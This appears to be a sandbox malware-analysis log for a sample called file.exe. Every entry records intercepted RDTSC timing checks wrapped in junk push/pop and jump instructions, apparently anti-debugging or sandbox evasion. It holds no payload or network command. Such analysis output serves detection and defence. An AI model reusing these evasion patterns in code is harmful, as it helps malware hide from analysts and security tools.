               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA235 second address: BDA24C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA9B0 second address: BDA9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA9B6 second address: BDA9C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F65E53D9516h 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAA3F second address: BDAA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDABC8 second address: BDABCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDABCD second address: BDABD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDABD3 second address: BDAC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F65E53D9526h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65E53D951Eh 0x00000019 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB1DE second address: BDB200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB200 second address: BDB204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB53D second address: BDB541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB541 second address: BDB545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB610 second address: BDB614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB614 second address: BDB618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CF15 second address: C0CF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F65E53D48C5h 0x0000000b popad 0x0000000c push edi 0x0000000d jmp 00007F65E53D48C8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CF4C second address: C0CF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CF51 second address: C0CF89 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65E53D48CDh 0x00000008 pushad 0x00000009 jmp 00007F65E53D48C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D3E2 second address: C0D3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D3EB second address: C0D3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D53E second address: C0D543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D543 second address: C0D558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F65E53D48B6h 0x0000000a jmp 00007F65E53D48BBh 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D558 second address: C0D55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1402A second address: C14030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14030 second address: C14038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14038 second address: C1403C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1403C second address: C14059 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65E53D951Fh 0x00000013 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12A9A second address: C12AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12AA4 second address: C12AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12D49 second address: C12D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C12E9B second address: C12EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13129 second address: C13137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 je 00007F65E53D48B8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13137 second address: C13141 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D9533h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1325E second address: C13268 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F65E53D48B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C133CC second address: C133D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65E53D9516h 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13523 second address: C13527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13527 second address: C1352F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C136B2 second address: C136B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C136B6 second address: C136CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F65E53D951Eh 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C136CC second address: C136D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C136D0 second address: C136E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F65E53D9516h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C136E2 second address: C136E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C136E6 second address: C13702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13702 second address: C13708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13708 second address: C1371F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1371F second address: C13723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13723 second address: C1372F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1372F second address: C13734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13A41 second address: C13A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007F65E53D9516h 0x0000000e je 00007F65E53D9516h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007F65E53D951Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C127EC second address: C127F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C127F6 second address: C127FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15A79 second address: C15A82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15A82 second address: C15AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D951Fh 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F65E53D9526h 0x00000016 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15AB3 second address: C15ABF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D48B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C186F0 second address: C186F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C186F6 second address: C186FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A666 second address: C1A66A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A66A second address: C1A672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1D1DB second address: C1D1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1D1E3 second address: C1D1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1D32F second address: C1D33C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1D33C second address: C1D342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C241A0 second address: C241A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C241A4 second address: C241AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C242F1 second address: C242F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C242F7 second address: C2430C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F65E53D48B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007F65E53D48B8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2430C second address: C2431F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F65E53D9516h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jng 00007F65E53D9516h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2431F second address: C24328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24328 second address: C2432C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2432C second address: C24330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C24330 second address: C24336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29C9A second address: C29CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29CA3 second address: C29CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29DE7 second address: C29DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29DEC second address: C29DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29DF2 second address: C29DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29F6E second address: C29F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29F74 second address: C29F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A0AD second address: C2A0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A0B1 second address: C2A0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F65E53D48C4h 0x0000000e pop esi 0x0000000f jne 00007F65E53D48B8h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F65E53D48C8h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A0F3 second address: C2A0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A0F7 second address: C2A0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB00F second address: BDB018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB018 second address: BDB01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB1DA second address: BDB1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2A527 second address: C2A52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2AFAB second address: C2AFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F65E53D9516h 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2AFBA second address: C2AFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2AFBE second address: C2AFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D951Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C306C7 second address: C306FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65E53D48BDh 0x00000012 jmp 00007F65E53D48BDh 0x00000017 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C306FC second address: C30700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C30700 second address: C30710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F65E53D48B6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C30FEC second address: C31009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D9526h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31009 second address: C31026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C5h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31026 second address: C3102E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3102E second address: C31034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31300 second address: C31304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31304 second address: C3130A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3656C second address: C36585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C36889 second address: C36891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C36891 second address: C3689C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3689C second address: C368A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C36CD7 second address: C36CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jno 00007F65E53D9516h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C36CEA second address: C36CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B50B second address: C3B52C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F65E53D9521h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B52C second address: C3B53E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B53E second address: C3B548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B548 second address: C3B54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B54E second address: C3B567 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65E53D9516h 0x00000008 jng 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4491D second address: C44932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C1h 0x00000009 rdtsc
